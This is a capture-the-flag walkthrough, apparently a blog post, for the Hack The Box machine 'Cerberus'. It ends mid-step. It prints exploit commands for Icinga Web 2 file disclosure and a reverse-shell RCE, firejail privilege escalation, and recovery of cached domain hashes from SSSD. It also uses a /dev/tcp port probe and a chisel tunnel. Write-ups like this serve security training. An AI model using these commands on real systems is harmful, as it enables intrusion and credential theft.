Cerberus

bCerberus, a hard windows machine, mixture of linux and windows, involved exploiting icinga2 through two CVEs, arbitrary file disclosure (CVE-2022–24716) and Authenticated RCE (CVE-2022–24715) giving a shell as www-data , escalating privileges on linux system through firejail (CVE-2022–31214), being a root user, domain user’s cached hash was recovered from sssd which is then used to get a shell on the windows machine as matthew, scanning the DC, there was ADSelfService running vulnerable to un-authenticated RCE (CVE 2022 4796) giving a shell as SYSTEM user

Reconaissance

nmap

as usual we will start by scanning the open ports and running services

cerberus is a windows machine but for some reason the nmap scan tells that this is a linux machine (ubuntu) running an apache web server at port 8080 so this is confusing

TTL enumeration

The default initial TTL value for Linux/Unix is 64, and TTL value for Windows is 128

let's do a ping to the machine ip address 10.10.11.205

so the ttl shows that the target machine is a windows machine

let's use wireshark to and curl the apache web server and take a look at the TTL

first run wireshark

and select the vpn interface

and then after it starts listening for packets curl the machine ip

let's explain what this means :

initially the default linux TTL value is 64 but when the packet's sent to the linux machine hits a hop (router) the TTL value is decremented by 1

and in this case the TTL value is decremented by 2 because it hits first the hackthebox vpn hop and then hits the windows host operating system

so that confirms that there is a virtual machine running in the windows host operating system

add icinga.cerberus.local to the hosts file

now browse to this link http://icinga.cerberus.local:8080/icingaweb2 which is given in nmap scan

trying the default icinga web 2 credentials didn't work and looking at the source doesn't give any information on the version

so i tried to find public exploits and find two exploits that are interesting the first one is CVE-2022-24715 which impacts an RCE but requires credentials and the second one is CVE-2022-24716 which impacts a file disclosure vulnerability

so we will use the file disclosure vulnerability to leak interesting informations

download the exploit from this link : https://github.com/JacobEbben/CVE-2022-24716

we don't know where is the configuration files located to leak them so what we have to do is go to the official icinga documentation page https://icinga.com/docs/icinga-web/2.6/ and search for configuration and we get this which gives us all the configuration file names and also the path to them which is /etc/icingaweb2/<configuration_file_name>

python3 exploit.py http://icinga.cerberus.local:8080/icingaweb2 /etc/icingaweb2/roles.ini
python3 exploit.py http://icinga.cerberus.local:8080/icingaweb2 /etc/icingaweb2/resources.ini

and we have leaked the administrator credentials, we can now log in

Foothold to the linux machine as www-data

now since we have the credentials we can utilize the other CVE to get Remote Code Execution (RCE)

we need to generate a pem file first

python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2 -I 10.10.14.177 -P 1234 -u matthew -p IcingaWebPassword2023 -e /home/kali/hackthebox/hard/cerberus/id_rsa

and boom we've got a shell

this is the ubuntu version of ubuntu

upgrade dumb shell :

Privilege Escalation

vulnerable firejail SUID binary

listing all suid binaries

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

click on this link and copy the python exploit code and then paste it inside a python file, i named it firejail_exploit.py you can name it whatever you want

now try using the prevoius CVE to get another shell as www-data in another terminal

when you get a shell it very important to upgrade the shell in order for this to work

after we upgrade the shell run the command

firejail --join=<number_given>

and then

su -

Escaping linux machine through sssd cached credentials

if we take a look at the /etc/hosts we will find the ip address of the domain controller

let's take a look at running processes using the command

ps -ef --forst

we find that the sssd process is running. SSSD allows the Linux box to communicate with a domain, typically an LDAP (Lightweight Directory Access Protocol) server or an Active Directory domain.

i've been searching in hacktricks for linux active directory exploits or ways to get valuable informations about the active directory and i've found this

Linux Active DirectoryHackTricks

taking a look at the content existings in the /var/lib/sss/secrets/secrets.db using strings we don't find anything

.secret.mkey file doesn't exist so i changed directory to the parent and i have found a couple of interesting db files

the one contains cache looks more interesting

to search through it we will use the command strings

strings -m 10 cache_cerberus.local.ldb

scrolling down in the results we find a long string that looks like a hash in someway

and i have used an online service that identifies the hash type and also tries to crack it agains a database https://hashes.com/en/tools/hash_identifier

and it found the hash value which is => 147258369

and the username is matthew

we have username and password of a user in the windows machine

first let's check if the winrm port 5985 is open and then we will do a reverse tunneling using chisel to connect to the windows machine from our attack machine since evil-winrm is not installed on the compromised linux machine

echo 1 > /dev/tcp/172.16.22.1/5985; echo $?

This command attempts to open a TCP connection to the specified IP address and port number (172.16.22.1 on port 5985) using the /dev/tcp special file in Unix-like systems.

if the TCP connection attempt is successful (i.e., if the port is open and accepting connections), the exit status ($?) will be 0, and echo 0 will print 0. If the connection attempt fails (i.e., the port is closed or unreachable), the exit status will be 1, and echo 1 will print 1.

reverse tunneling using chisle

now let's use chisle to do a reverse tunnel so we can use evil-winrm from our attack machine and connect to the windows machine at the ip address 172.16.22.1

first we will open a file share so we can transfer the chisle binary to the compromised linux machine